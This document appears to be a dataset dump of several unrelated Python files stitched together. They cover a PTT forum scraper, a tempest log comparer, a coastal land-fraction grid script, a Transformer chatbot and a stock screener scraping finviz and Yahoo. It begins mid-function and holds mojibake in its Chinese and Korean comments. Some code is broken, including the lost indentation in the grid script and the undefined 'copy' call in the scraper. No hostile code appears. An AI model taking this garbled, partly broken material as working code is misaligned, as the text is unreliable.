    return img, crpix1p, crpix2p, crval1p, crval2p, cdelt1p, cdelt2p, status
|
12,977 | 5804747bc3220fdc8fd7b777f9c4270332a00999 | #2020-12-08
#machine > car.py
#machine > tv.py
import machine.car
import machine.tv
machine.car.drive()  # demo: call drive() from the machine.car submodule
machine.tv.watch()   # demo: call watch() from the machine.tv submodule
'''
์ด์ ํ๋ค
์์ฒญํ๋ค
'''
|
12,978 | 9fd05aeef60ac4c8bc8b138f9b07c06f9ebd4a22 | # -*- coding: utf-8 -*-
"""
@file: __init__
@author: Memory
@date: 2020/10/11
"""
from .baiduOCR import BaiduOCR
from .xueersiOCR import LatexOCR
from .ocr import OCR
plugin = OCR
|
12,979 | dee0033c3227fa0d6ee15da8adc6a5ee2c06f424 | # -*- coding: utf-8 -*-
"""
Created on Thu Apr 12 16:04:56 2018
@author: LYC
"""
############# ๆPTT ๆฐ็ซน็ ######################################
import requests
from bs4 import BeautifulSoup
import time
import threading
import sys
import xlwt
import xlrd
# module-level workbook and single worksheet that all functions below share
book = xlwt.Workbook(encoding = "utf-8")
sheet1 = book.add_sheet("่ด้")
def main(orig_args):
    """Create the output workbook for the scraped giveaway list.

    *orig_args* (sys.argv) is accepted but unused.
    """
    filename = "PTTๆฐ็ซน็่ด้.xls"
    output(filename)
def output(filename):
    """Write the header row (id, date, item, url) and save the workbook."""
    sheet1.write(0,0,'็ทจ่')
    sheet1.write(0,1,'ๆฅๆ')
    sheet1.write(0,2,'็ฉๅ')
    sheet1.write(0,3,'็ถฒๅ')
    book.save(filename)
main(sys.argv)  # build the workbook scaffold immediately at import time
def open_save(pos1,pos2,str):
    """Re-open the saved workbook, write one cell at (pos1, pos2), save it back.

    NOTE(review): ``copy`` is never defined or imported in this file -- the
    intended import is presumably ``from xlutils.copy import copy``.  As
    written the call raises NameError, which the IOError handler below
    does not catch.  Also, *str* shadows the builtin.
    """
    try:
        inbook = xlrd.open_workbook('PTTๆฐ็ซน็่ด้.xls',formatting_info = True)
        outbook = copy(inbook)
        outbook.get_sheet(0).write(pos1,pos2,str)
        outbook.save('PTTๆฐ็ซน็่ด้.xls')
    except IOError:
        print('ERROR!')
        sys.exit('No such file: PTTๆฐ็ซน็่ด้.xls')
def get_page(url):
    """Fetch *url* over HTTP and return the response body as text."""
    return requests.get(url).text
def get_next_url(dom):
    """Return the absolute URL of the previous index page, or None at the end.

    PTT index pages list newest articles first, so the "previous page"
    button walks backwards in time; when that button is disabled we have
    reached the oldest page and None is returned to stop the crawl loop.
    """
    soup = BeautifulSoup(dom, 'lxml')
    base_url = 'https://www.ptt.cc'
    next_url = []
    check = []
    divs = soup.find_all('div', 'btn-group btn-group-paging')
    for d in divs:
        # a disabled 'btn wide' anchor marks the oldest index page
        check = d.find_all('a', 'btn wide disabled')
        href = d.find_all('a', 'btn wide')[1]['href']
        next_url.append(href)
    if check and check[0].text == 'โน ไธ้ ':
        print(check[0].text)
        return None
    return base_url + next_url[0]
def get_gift(dom,number):
    """Harvest giveaway articles from one PTT index page into the workbook.

    Parses every 'r-ent' row of *dom*, keeps articles whose bracketed title
    tag matches the giveaway marker, de-duplicates against titles already
    collected on this page, writes (index, date, title, url) rows starting
    after row *number* via open_save, and returns the next free row number.

    Fixes: two source comments had been split across lines in a way that
    left bare non-ASCII identifiers executing as expressions (NameError at
    runtime); dead commented-out code and the unused ``date`` local were
    removed.
    """
    soup = BeautifulSoup(dom, "lxml")
    list_title = []
    list_date = []
    list_link = []
    base_url = 'https://www.ptt.cc'
    articles = []
    divs = soup.find_all('div', 'r-ent')
    for d in divs:
        date_article = d.find('div', 'date').string.lstrip()
        if d.find('a'):
            href = d.find('a')['href']
            title = d.find('a').string
            articles.append({
                'title': title,
                'href': base_url + href,
                'date': date_article
            })
    gift = '่ด้'
    for ord in range(len(articles)):
        # keep only giveaway posts: the tag between the title's brackets
        if articles[ord]['title'][1:3] == gift:
            # skip titles already collected on this page (duplicates)
            Judge = 0
            for ord_list in range(len(list_title)):
                if len(list_title)!=0 and articles[ord]['title'][0:len(articles[ord]['title'])] == list_title[ord_list]:
                    Judge = -1
            if Judge == 0:
                list_title.append(articles[ord]['title'][0:len(articles[ord]['title'])])
                list_link.append(articles[ord]['href'][0:len(articles[ord]['href'])])
                list_date.append(articles[ord]['date'][0:len(articles[ord]['date'])])
            else:
                Judge = 0
    # persist the collected rows to the Excel workbook
    for ord_list in range(len(list_title)):
        open_save(ord_list+1 + number ,0,ord_list+1 + number)
        open_save(ord_list+1 + number ,1,list_date[ord_list])
        open_save(ord_list+1 + number ,2,list_title[ord_list])
        open_save(ord_list+1 + number ,3,list_link[ord_list])
    next_order = number + len(list_title)
    return next_order
# print(list_title,list_link,list_date)
############ ๅบๅฎๅ็ง่ทไธๆฌก #############
#def t2():
# while 1:
# get_gift()
# time.sleep(10)
#
#t = threading.Thread(target = t2)
#t.start()
#get_gift()
def percentage(times):
    """Print crawl progress as a percentage of the ~4004 index pages."""
    print('ๅฎๆๅบฆ: ' + '%.2f%%' % (times/4004*100))
# crawl every index page of the Hsinchu board, newest to oldest,
# harvesting giveaway posts; get_next_url returns None at the oldest page
urls = 'https://www.ptt.cc/bbs/Hsinchu/index.html'
times = 1;
next_order = 0
while urls != None:
    res = get_page(urls)
    next_order = get_gift(res,next_order)
    urls = get_next_url(res)
    percentage(times)
    times = times + 1
print('Done!!!!!!!!!!!!!!!!!!') |
12,980 | 3a5730fdfe4e92ff97070ce7a995eff21ce71d8d | import re
import sys
src=sys.argv[1]#command line arguments: first is the source log
dest=sys.argv[2]  # second is the destination log to compare against
class matcher:
    """Compare two 'tempest' test-result logs and write report files.

    Each log line of interest has the form 'tempest.<name> ... <STATUS>'.
    Reports written to the working directory: same.txt, difference.txt,
    any.txt, fns.txt, snf.txt.

    NOTE(review): Python 2 code (print statements, dict.has_key).  The
    constructor takes sr/dr parameters but actually opens the module-level
    globals ``src``/``dest`` -- confirm whether that is intended.  Report
    file handles are rebound (f=0) rather than closed.
    """
    def __init__(self,sr,dr):
        """Open both logs and initialise the parse state."""
        #opeaning file
        self.sr=open(src)
        self.dr=open(dest)
        #temp variables
        self.st0=''
        self.st1=''
        self.dt0=''
        self.dt1=''
        #dict variables: test name -> status, per log
        self.dict1={}
        self.dict2={}
        #list variables: full 'name ... status' lines, per log
        self.list1= []
        self.list2 = []
    def ext(self):
        """Extract 'tempest... ... STATUS' pairs from both logs into the dicts/lists."""
        #source file extraction
        try:
            for line in self.sr:
                sq = re.search(r'(tempest.*)',line,re.IGNORECASE)
                if sq:
                    result = str(sq.group())
                    result_split = result.split(' ... ')
                    self.st0=result_split[0]#temp
                    self.st1=result_split[1]#temp
                    result_strip = self.st1.strip('\r')
                    self.dict1[self.st0]=result_strip #dict
                    self.list1.append(str(self.st0)+' ... '+str(result_strip))#list
        except IndexError:
            # a tempest line without ' ... ' has no status field; abort quietly
            pass
        #destination file extraction
        try:
            for line in self.dr:
                sq = re.search(r'(tempest.[a-zA-Z](.*))',line,re.MULTILINE|re.IGNORECASE)
                if sq:
                    result = str(sq.group())
                    result_split = result.split(' ... ')
                    self.dt0=result_split[0]#temp
                    self.dt1=result_split[1]#temp
                    result_strip = self.dt1.strip('\r')
                    self.dict2[self.dt0]=result_strip #dict
                    self.list2.append(str(self.dt0)+' ... '+str(result_strip))#list
        except IndexError:
            print 'no error'
    def line_count(self):
        """Print how many tempest lines each log contained."""
        print "No of lines starting with 'tempest' in Source : ",len(self.dict1)#lines starting with 'tempest' in Source
        print "No of lines starting with 'tempest' in Destination : ",len(self.dict2)#lines starting with 'tempest' in Destination
    def line_same(self):# same status
        """Write tests with identical name and status in both logs to same.txt."""
        count=0
        f=open("same.txt",'w+')
        for i in self.list1:
            for j in self.list2:
                if i==j:
                    f.writelines(i+'\n')#writing to file
                    count+=1
        print "No of lines having status same:", count
        f=0
    def line_differ(self): #diff status
        """Write tests present in both logs but with different status to difference.txt."""
        count=0
        f=open("difference.txt",'w+')
        for key in self.dict1:
            for key1 in self.dict2:
                if (key==key1):
                    if(self.dict1[key]!=self.dict2[key1]):
                        f.writelines(key+'\n')#writing to file
                        count=count+1
        print "No of lines having status difference",count
        f=0
    def line_any(self):# ANY STATUS
        """Write tests whose status is neither 'ok' nor 'FAIL' (either log) to any.txt."""
        #source dif count
        f=open("any.txt",'w+')
        count=0
        for key in self.dict1:
            if (self.dict1[key]!='ok')&(self.dict1[key]!='FAIL'):
                f.writelines(key+'\n')#writing to file
                count=count+1
        #destination dif count
        count1=0
        for key in self.dict2:
            if(self.dict2[key]!='ok')&(self.dict2[key]!='FAIL'):
                f.writelines(key+'\n')#writing to file
                count1=count1+1
        #add both difference count
        print "No of lines having status anything",count+count1
        f=0
    def line_source(self):#first to second
        """Write tests present in source but missing from destination to fns.txt."""
        count=0
        f=open("fns.txt",'w+')
        for key in self.dict1:
            if self.dict2.has_key(key):
                continue
            else:
                f.writelines(key+'\n')#writing to file
                count=count+1
        print "No of lines available in source not in destination",count
        f=0
    def line_destination(self):#second to first
        """Write tests present in destination but missing from source to snf.txt."""
        count=0
        f=open("snf.txt",'w+')
        for key in self.dict2:
            if self.dict1.has_key(key):
                continue
            else:
                f.writelines(key+'\n')#writing to file
                count=count+1
        print "No of lines available in destination not in source",count
        f=0
# drive the comparison: parse both logs, then emit every report
a=matcher(src,dest)#calling class
#calling def
a.ext()
a.line_count()
a.line_same()
a.line_differ()
a.line_any()
a.line_source()
a.line_destination() |
12,981 | 0f706bcd1bc0cc197a1bae842811a1829751123a | import random
import sys
import os
import csv
import numpy as np
import createrawmatrix
class structtype():
    """Empty attribute bag, used like a MATLAB-style struct."""
    pass
M = createrawmatrix.M  # model grid description shared with createrawmatrix
region = 'global'
earthGrid = np.genfromtxt(os.path.join(os.getcwd(),'elevationdata.csv'), delimiter=',',dtype=float)
earthGrid = np.array(earthGrid)
#earthGrid is a 3601x1801 matrix, where the first column is latitude (89.95 up until -89.95, from North to South with increasing index)
#and the first row being longitude from -179.95 up to 179.95
lats = earthGrid[1::,0]
lons = earthGrid[0,1::]
#strip grid of index column and row and rearrange the matrix to fit index order of createrawmatrix (and other files)
earthGrid = np.delete(earthGrid,0,1) #delete latitude index column
shift = np.where(earthGrid[0] > 0)[0][0]
earthGrid = np.roll(earthGrid,shift,axis=1) #shift matrix from -180 < lon < 180 to 0 < lon < 360
earthGrid = np.delete(earthGrid,0,0) #delete longitude index row
earthGrid = np.flipud(earthGrid) #reverse matrix from 90 > lon > -90 to -90 < lon < 90
#rearrange index order to match the transformed grid
lons = np.roll(lons,shift)
lats = np.fliplr([lats])[0]
lons[np.where(lons < 0)] += 360
# classify each cell: 0 = sea (elevation sentinel > 9998), 1 = land
coastalGrid = np.empty(np.shape(earthGrid),dtype=int)
for row in np.arange(lats.size):
    for col in np.arange(lons.size):
        if earthGrid[row][col] > 9998: #sea
            coastalGrid[row][col] = 0
        else: #land
            coastalGrid[row][col] = 1
#convert input grid to flat indices
inputMesh = np.meshgrid(lons,lats)
nx = inputMesh[0].flatten()
ny = inputMesh[1].flatten()
coastalGrid = coastalGrid.flatten()
ni = np.empty(coastalGrid.shape,dtype='int')
ni[:] = -9999   # -9999 marks cells not yet mapped to any model domain
#compare coastalGrid to createrawmatrix resolution
for d in np.arange(M.nd):
D = np.where((nx >= M.lons[d][0]) & (nx <= M.lons[d][-1]) & (ny >= M.lats[d][0]) & (ny <= M.lats[d][-1]))[0] #take data lons and lats between defined bounds of Model lons and lats.
xi = np.floor( (nx[D]-M.lons[d][0])/M.dd[d] ).astype(int) #iterative start values for lon/lat within area are data values lon/lat minus first lon/lat values divided by stepsize
yi = np.floor( (ny[D]-M.lats[d][0])/M.dd[d] ).astype(int) #see above. If lon of data and lon of model target match, xi[0] = 0, otherwise e.g. lon.data = 4, lon.target = 1, 5 samples per 1 lat -> xi starts at ((4-1)/0.2) = 15. Note: xi/yi is all eligible data values, not just start value
for i in np.arange(xi.size):
ni[D[i]] = np.ravel_multi_index((xi[i],yi[i]),(M.nx[d],M.ny[d]),order='F') #similarly to method in createrawmatrix
resultIndex = np.arange(0,M.nc[d]) #indexation identical to model (createrawmatrix)
resultCoast = np.zeros(M.nc[d]) #array for summing land/sea/coast data per index
resultNorm = np.zeros(M.nc[d]) #amount of cells from input grid per cell for output grid
for i in np.arange(coastalGrid.size) :
if ni[i] > -9900:
if coastalGrid[i] == 1 :
resultCoast[ni[i]] += coastalGrid[i]
resultNorm[ni[i]] += 1
else :
resultNorm[ni[i]] += 1
resultNorm[np.where(resultNorm == 0)] = 100 #edge indices (prime meridian, poles) don't have coastalGrid cells in them (so will remain 0) but also do not alter results. This statements prevents division by zero
resultCoast = resultCoast / resultNorm
f = open("frac_coast_dx_" + str((M.dd[d] * 100).astype(int)) + "_region_" + region + ".csv",'w') #also clear it if it exists
f.write('index,lat,lon,fraction\n')
for i in np.arange(resultIndex.size) : #write land/sea fraction to file for every location
x, y = np.unravel_index(resultIndex[i],(M.nx[d],M.ny[d]),order='F')
f.write(str(resultIndex[i]) + ',' + str(M.lats[d][y]) + ',' + str(M.lons[d][x]) + ',' + str(resultCoast[i]) + '\n')
f.close()
|
12,982 | f1539f9a0b50c775895bc14a04af37d72154d61d | import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.quantization
import pickle, random, itertools, os, math, re
import numpy as np
from .settings import *
from .transformer import Transformer, nopeak_mask
from .pre_processing import Voc, process_punct, indexesFromSentence
torch.set_grad_enabled(False)
def model_device(model):
    """Return the torch.device on which *model*'s first parameter lives."""
    first_param = next(iter(model.parameters()))
    return first_param.device
def zeroPadding(l, fillvalue=PAD_token):
    """Transpose a batch of index sequences, padding the short ones.

    Returns a list of tuples: position t of every sequence, with *fillvalue*
    substituted wherever a sequence is shorter than the longest one.
    """
    longest = max((len(seq) for seq in l), default=0)
    return [
        tuple(seq[t] if t < len(seq) else fillvalue for seq in l)
        for t in range(longest)
    ]
def binaryMatrix(l, value=PAD_token):
    """Build a mask for a (transposed) padded batch: 0 where an entry equals
    the padding *value*, 1 elsewhere.

    Bug fix: the comparison now uses the *value* parameter instead of always
    comparing against the module-level PAD_token — the parameter was silently
    ignored before. Behavior is unchanged for default calls.
    """
    m = []
    for i, seq in enumerate(l):
        m.append([])
        for token in seq:
            if token == value:
                m[i].append(0)
            else:
                m[i].append(1)
    return m
# Returns padded input sequence tensor and lengths
def inputVar(indexes_batch):
    """Pad a batch of input index sequences; also report each original length."""
    seq_lengths = torch.tensor([len(seq) for seq in indexes_batch])
    padded = torch.LongTensor(zeroPadding(indexes_batch))
    return padded, seq_lengths
# Returns padded target sequence tensor, padding mask, and max target length
def outputVar(indexes_batch):
    """Pad a batch of target sequences; also return a byte mask marking real
    (non-PAD) positions and the longest target length."""
    longest = max(len(seq) for seq in indexes_batch)
    padded_list = zeroPadding(indexes_batch)
    pad_mask = torch.ByteTensor(binaryMatrix(padded_list))
    padded = torch.LongTensor(padded_list)
    return padded, pad_mask, longest
# Returns all items for a given batch of pairs
def batch2TrainData(pair_batch):
    """Convert (input, target) index-sequence pairs into padded tensors.

    Sorts the batch in place by input length (longest first), prepends
    SOS_token to every target, then returns the padded input tensor with
    lengths plus the padded target tensor, mask and max target length.
    """
    pair_batch.sort(key=lambda pair: len(pair[0]), reverse=True)  # orden por len of inp
    input_batch = [pair[0] for pair in pair_batch]
    output_batch = [[SOS_token] + pair[1] for pair in pair_batch]
    inp, lengths = inputVar(input_batch)
    output, mask, max_target_len = outputVar(output_batch)
    return inp, lengths, output, mask, max_target_len
def custom_capitalize(s):
    """Capitalize *s* starting at its first alphabetic character, leaving any
    leading non-letters (digits, punctuation) untouched.

    Bug fix: the original reused the loop variable after the loop, raising
    NameError for the empty string; strings with letters behave exactly as
    before, and strings without letters are returned unchanged.
    """
    for i, c in enumerate(s):
        if c.isalpha():
            return s[:i] + s[i:].capitalize()
    return s
def reformatString(l):
    """Normalize a decoded answer: trim, lowercase, tighten punctuation
    spacing, collapse whitespace and capitalize the first letter."""
    s = l.strip().lower()
    # s = re.sub(r"<guion_inic>",r"", s)
    s = re.sub(r"\s+([.!?])", r"\1", s)  # no space before closing punctuation
    # Bug fix: the character class contained mojibake ("ยกยฟ", the cp874
    # mis-decoding of the intended UTF-8 bytes); restored the Spanish
    # inverted marks the chatbot actually emits.
    s = re.sub(r"([¡¿])\s+", r"\1", s)  # no space after opening punctuation
    s = re.sub(r"\s+", r" ", s)
    return custom_capitalize(s).strip()
def k_best_outputs(k_outs, out, log_scores, i, k):
    """One beam-search step: keep the k best continuations.

    out        -- softmaxed decoder output, shape (k, seq, vocab)
    log_scores -- running log-probability per beam, shape (1, k)
    i          -- index of the output position being filled
    Returns the updated (k_outs, log_scores).
    """
    step_probs, step_ix = out[:, -1].data.topk(k)
    # Total log-probability of every (beam, candidate) combination.
    cand_scores = torch.Tensor(
        [math.log(p) for p in step_probs.data.view(-1)]
    ).view(k, -1) + log_scores.transpose(0, 1)
    best_scores, best_flat = cand_scores.view(-1).topk(k)
    beam_idx = best_flat // k   # which beam each winner extends
    word_idx = best_flat % k    # which of that beam's k candidates won
    k_outs[:, :i] = k_outs[beam_idx, :i]
    k_outs[:, i] = step_ix[beam_idx, word_idx]
    return k_outs, best_scores.unsqueeze(0)
class TransformerChatbot:
    """Beam-search chatbot built on a Transformer seq2seq checkpoint.

    Loads a pickled vocabulary plus (optionally dynamically quantized)
    model weights from disk and answers sentences via :meth:`beam_search`.
    """
    def __init__(self,data_path=None,load_quant=True,use_cuda=False):
        """Load model with saved parameters
        Args:
            data_path: str. Path where the model is saved. Default: ./data/Transformer_500k_UNK
            load_quant: bool. Load the quantized version of the model.
            use_cuda: bool. Use of GPU.
        """
        data_path = os.path.join("data", "Transformer_500k_UNK") if data_path==None else data_path
        if not os.path.isdir(data_path) or len(os.listdir(data_path)) == 0:
            raise FileNotFoundError(f"No such file or directory: {data_path}, set the path to your model "
                "directory or download the pre-trained one from https://github.com/Rvbens/Chatbot-en-Espanol "
                "and uncompress on ./data.")
            #download('transformer',load_quant)
        with open(data_path + '/voc.pkl', 'rb') as f:
            self.voc = pickle.load(f)
        self.device = torch.device("cuda" if use_cuda else "cpu")
        self.model = self.from_checkpoint(data_path,load_quant,use_cuda)
        self.searcher = self.beam_search

    def from_checkpoint(self,data_path,load_quant=False,use_cuda=torch.cuda.is_available()):
        """Build the Transformer and load weights from the checkpoint file."""
        print(f'Loading: {data_path}')
        d_model = 512 #original 512
        heads = 8
        N = 6 #original 6
        src_vocab = self.voc.num_words
        trg_vocab = self.voc.num_words
        model = Transformer(src_vocab, trg_vocab, d_model, N, heads,0.1)
        model = model.to(self.device)
        if load_quant and use_cuda:
            raise RuntimeError('Quantization not supported on CUDA backends')
        if load_quant:
            loadFilename = os.path.join(data_path, 'checkpoints','transformer_quant_checkpoint.tar')
            # dynamic int8 quantization of linear/LSTM modules (CPU only)
            model = torch.quantization.quantize_dynamic(
                model, {nn.LSTM, nn.Linear}, dtype=torch.qint8
            )
        else:
            loadFilename = os.path.join(data_path, 'checkpoints','transformer_checkpoint.tar')
        if use_cuda:
            checkpoint = torch.load(loadFilename)
        else:
            checkpoint = torch.load(loadFilename, map_location=torch.device('cpu'))
        model.load_state_dict(checkpoint['params'])
        # the checkpoint carries its own vocabulary state; overwrite ours
        self.voc.__dict__ = checkpoint['voc_dict']
        model.eval()
        return model

    def init_vars(self, src, k):
        """Encode *src* once and seed the k beams with the k best first words."""
        src_mask = (src != PAD_token).unsqueeze(-2)
        e_output = self.model.encoder(src, src_mask)
        frst_dec_inp = torch.LongTensor([[SOS_token]]).to(self.device)
        trg_mask = nopeak_mask(1).to(self.device)
        out = self.model.out(self.model.decoder(frst_dec_inp, e_output, src_mask, trg_mask))
        out = F.softmax(out, dim=-1) #(bs,sl,voc_size)
        probs, ix = out[:, -1].data.topk(k) #(1,k)
        log_scores = torch.Tensor([math.log(prob) for prob in probs.data[0]]).unsqueeze(0) #(1,k)
        k_outs = torch.zeros(k, MAX_LENGTH).long().to(self.device)
        k_outs[:, 0] = SOS_token
        k_outs[:, 1] = ix[0] #first col with all the first k words
        # replicate the encoder output across the k beams
        e_outputs = torch.zeros(k, e_output.size(-2),e_output.size(-1)).to(self.device)
        e_outputs[:, :] = e_output[0]
        return k_outs, e_outputs, log_scores

    def beam_search(self, model, src, k=10):
        """Beam-search decode *src* and return the chosen token tensor
        (SOS/EOS stripped). The final beam is *sampled* proportionally to
        exp(length-normalized score) rather than taking the argmax."""
        k_outs, e_outputs, log_scores = self.init_vars(src, k)
        src_mask = (src != PAD_token).unsqueeze(-2)
        ind = 0
        score= torch.tensor([[1 for i in range(k)]]).float()
        for i in range(2, MAX_LENGTH):
            trg_mask = nopeak_mask(i).to(self.device)
            out = self.model.out(self.model.decoder(k_outs[:,:i],e_outputs, src_mask, trg_mask))
            out = F.softmax(out, dim=-1)
            k_outs, log_scores = k_best_outputs(k_outs, out, log_scores, i, k)
            # stop once every beam has produced at least one EOS
            finish_outs = len(set((k_outs==EOS_token).nonzero()[:,0].cpu().numpy()))
            if finish_outs == k:
                break
        alpha = 0.7  # length-normalization exponent
        x = (k_outs==EOS_token).nonzero()
        # collect the first EOS position of each beam, in beam order
        EOS_idx = []
        out_idx=0
        for i in range(len(x)):
            if x[i][0] == out_idx:
                EOS_idx.append(i)
                out_idx+=1
        out_lens = x[EOS_idx][:,1]
        div = 1/(out_lens.type_as(log_scores)**alpha)
        score = log_scores * div
        _, ind = torch.max(score, 1)
        ind = ind.data[0]
        # NOTE(review): `ind` (the argmax beam) is computed but unused; the
        # output is sampled with exp(score) weights instead — confirm intent.
        out = k_outs[random.choices([i for i in range(k)], torch.exp(score[0]))]
        length = (out[0]==EOS_token).nonzero()[0]
        out = out[0][1:length]
        return out

    def evaluate(self, sentence, max_length=MAX_LENGTH):
        """Turn a whitespace-tokenized sentence into a decoded word list."""
        ### Format input sentence as a batch
        # words -> indexes
        sentence = sentence.split()
        indexes_batch = [indexesFromSentence(sentence, self.voc)] #list of tokens
        # Transpose dimensions of batch to match models' expectations
        input_batch = torch.LongTensor(indexes_batch).to(self.device) #(bs=1,seq_len)
        # Decode sentence with searcher
        tokens = self.searcher(self.model, input_batch)
        # indexes -> words
        decoded_words = [self.voc.index2word[token.item()] for token in tokens]
        return decoded_words

    def evaluateOneInput(self, input_sentence):
        """ Give an answer to the input sentence using the model """
        input_sentence = process_punct(input_sentence.encode())
        # Evaluate sentence
        output_words = self.evaluate(input_sentence)
        # Format and print response sentence
        output_words[:] = [x for x in output_words if not (x =='SOS' or x == 'EOS' or x == 'PAD')]
        raw_ans = ' '.join(output_words)
        ans = reformatString(raw_ans)
        return ans

    def evaluateCycle(self):
        """ Continous loop of inputs and answers"""
        print("Enter q or quit to exit")
        input_sentence = ''
        while(1):
            # Get input sentence
            input_sentence = input('> ')
            # Check if it is quit case
            if input_sentence == 'q' or input_sentence == 'quit': break
            ans = self.evaluateOneInput(input_sentence)
            print('Bot:', ans)
|
12,983 | e7f3f2f6abe07b1af0d1bc8eeef431a3d5d757f3 | #! /usr/bin/python
import requests
import csv
import yql
import pdb
from datetime import datetime
from decimal import Decimal
import time
import re
import sys
import os
import multiprocessing
from BeautifulSoup import BeautifulSoup
import StringIO
import getopt
# Column order for the snapshot CSV; also the full set of per-stock fields
# that the importers and rank computations populate.
stock_keys = [
    "Ticker",
    "Company",
    "MarketCap",
    "PE",
    "PS",
    "PB",
    "PFreeCashFlow",
    "DividendYield",
    "PerformanceHalfYear",
    "Price",
    "BB",
    "EVEBITDA",
    "BBY",
    "SHY",
    "PERank",
    "PSRank",
    "PBRank",
    "PFCFRank",
    "SHYRank",
    "EVEBITDARank",
    "Rank",
    "OVRRank"
]
def generate_snapshot_to_csv(output):
    """Build a full stock snapshot and dump it as a CSV under *output*."""
    snapshot = generate_snapshot({})
    to_csv(snapshot, output)
def generate_snapshot(data):
    """Populate *data* (ticker -> stock dict) from finviz/Yahoo and rank it."""
    print "Creating new snapshot"
    import_finviz(data)
    import_evebitda(data)
    # serial scrape (parallel=False); see import_buyback_yield
    import_buyback_yield(data, False)
    compute_rank(data)
    return data
def import_finviz(processed_data):
print "Importing data from finviz"
# not using f=cap_smallover since it filters market caps over 300M instead of 200M
#r = requests.get('http://finviz.com/export.ashx?v=152', cookies={"screenerUrl": "screener.ashx?v=152&f=cap_smallover&ft=4", "customTable": "0,1,2,6,7,10,11,13,14,45,65"})
r = requests.get('http://finviz.com/export.ashx?v=152', cookies={"screenerUrl": "screener.ashx?v=152&ft=4", "customTable": "0,1,2,6,7,10,11,13,14,45,65"})
data = csv_to_dicts(r.text)
tickers = []
for row in data:
try:
stock = {}
if row["Ticker"]:
stock["Ticker"] = row["Ticker"]
if "Importing " + row["Company"]:
stock["Company"] = row["Company"]
# Ignore companies with market cap below 200M
if not "Market Cap" in row or row["Market Cap"] == "":
continue
market_cap = Decimal(row["Market Cap"])
if market_cap < 200:
continue
stock["MarketCap"] = row["Market Cap"]
if row["P/E"]:
stock["PE"] = row["P/E"]
if row["P/S"]:
stock["PS"] = row["P/S"]
if row["P/B"]:
stock["PB"] = row["P/B"]
if row["P/Free Cash Flow"]:
stock["PFreeCashFlow"] = row["P/Free Cash Flow"]
if row["Dividend Yield"]:
stock["DividendYield"] = row["Dividend Yield"][:-1]
if row["Performance (Half Year)"]:
stock["PerformanceHalfYear"] = row["Performance (Half Year)"][:-1]
if row["Price"]:
stock["Price"] = row["Price"]
processed_data[stock["Ticker"]] = stock
except Exception as e:
print e
#pdb.set_trace()
print "Finviz data imported"
def import_evebitda(data):
    """Fetch EV/EBITDA for every ticker via YQL (Yahoo keystats), batching
    queries, and store it as stock["EVEBITDA"]."""
    y = yql.Public()
    step=100
    tickers = data.keys()
    for i in range(0,len(tickers),step):
        # NOTE(review): the slice end is i+step-1, so the last ticker of each
        # 100-wide window is skipped — confirm whether that is intentional.
        nquery = 'select symbol, EnterpriseValueEBITDA.content from yahoo.finance.keystats where symbol in ({0})'.format('"'+('","'.join(tickers[i:i+step-1])+'"'))
        ebitdas = y.execute(nquery, env="http://www.datatables.org/alltables.env")
        if ebitdas.results:
            for row in ebitdas.results["stats"]:
                if "EnterpriseValueEBITDA" in row and row["EnterpriseValueEBITDA"] and row["EnterpriseValueEBITDA"] != "N/A":
                    data[row["symbol"]]["EVEBITDA"] = row["EnterpriseValueEBITDA"]
        else:
            pass
def import_single_buyback_yield(stock):
    """Scrape Yahoo's cash-flow page for one stock and store the negated
    'Sale Purchase of Stock' total (dollars) under stock["BB"].

    Retries forever on network/parse errors; bails out silently when the
    page lacks the expected table.
    """
    done = False
    while not done:
        try:
            if not stock["MarketCap"]: break
            query = "http://finance.yahoo.com/q/cf?s="+stock["Ticker"]+"&ql=1"
            r = requests.get(query, timeout=5)
            html = r.text
            # Repair html
            html = html.replace('<div id="yucs-contextual_shortcuts"data-property="finance"data-languagetag="en-us"data-status="active"data-spaceid=""data-cobrand="standard">', '<div id="yucs-contextual_shortcuts" data-property="finance" data-languagetag="en-us" data-status="active" data-spaceid="" data-cobrand="standard">')
            html = re.sub(r'(?<!\=)"">', '">', html)
            soup = BeautifulSoup(html)
            #with open("html.html", "w") as f:
            #    f.write(html)
            #with open("file.html", "w") as f:
            #    f.write(soup.prettify())
            table = soup.find("table", {"class": "yfnc_tabledata1"})
            if not table: break
            table = table.find("table")
            if not table: break
            sale = 0
            for tr in table.findAll("tr"):
                title = tr.td.renderContents().strip()
                if title == "Sale Purchase of Stock":
                    # Accumulate the quarterly values: figures are in
                    # thousands, parentheses denote negative amounts.
                    for td in tr.findAll("td")[1:]:
                        val = td.renderContents().strip()
                        val = val.replace("(", "-")
                        val = val.replace(",", "")
                        val = val.replace(")", "")
                        val = val.replace(" ", "")
                        val = val.replace("\n", "")
                        val = val.replace("\t", "")
                        val = val.replace("\\n", "")
                        val = val.replace("&nbsp;", "")
                        if val == "-": continue
                        sale += int(val)*1000
            # positive BB means net buyback (company repurchased stock)
            stock["BB"] = -sale
            done = True
        except Exception as e:
            print e
            print "Trying again in 1 sec"
            time.sleep(1)
def import_buyback_yield(data, parallel=False):
    """Fill stock["BB"] for every stock, serially or with a 4-worker pool.

    NOTE(review): in the parallel branch Pool.map pickles each stock dict
    into the workers, so their mutations may never reach *data* — confirm
    before enabling parallel=True.
    """
    print "Importing Buyback Yield"
    if parallel:
        pool = multiprocessing.Pool(4)
        pool.map(import_single_buyback_yield, data.values())
    else:
        for stock in data:
            stock = data[stock]
            import_single_buyback_yield(stock)
    print "Completed Buyback Yield"
def compute_rank(data, step=0):
    """Run ranking stages from *step* onward.

    NOTE(review): only the BBY (step<=4) and SHY (step<=5) stages are wired
    up here; the other compute_*rank helpers defined below are never invoked
    — confirm whether that is intentional.
    """
    if step <=4:
        compute_bby(data)
    if step <=5:
        compute_shy(data)
    print "Done"
def compute_somerank(data, key, origkey=None, reverse=True, filterpositive=False):
    """Assign a percentile rank (0-100) under key+"Rank" based on *origkey*.

    Stocks missing *origkey* (or with negative values when *filterpositive*)
    are left unranked; equal raw values share the rank of the first stock
    holding that value. *reverse* (default) sorts descending before ranking.
    """
    origkey = origkey or key
    eligible = [
        s for s in data.values()
        if origkey in s and (not filterpositive or s[origkey] >= 0)
    ]
    eligible.sort(key=lambda s: s[origkey], reverse=reverse)
    total = len(eligible)
    previous_value = None
    for position, s in enumerate(eligible):
        if s[origkey] != previous_value:
            tie_rank = position          # ties inherit the first position
            previous_value = s[origkey]
        s[key + "Rank"] = Decimal(tie_rank) / total * 100
# Thin wrappers: percentile-rank each valuation metric via compute_somerank.
def compute_perank(data):
    compute_somerank(data, "PE")
def compute_psrank(data):
    compute_somerank(data, "PS")
def compute_pbrank(data):
    compute_somerank(data, "PB")
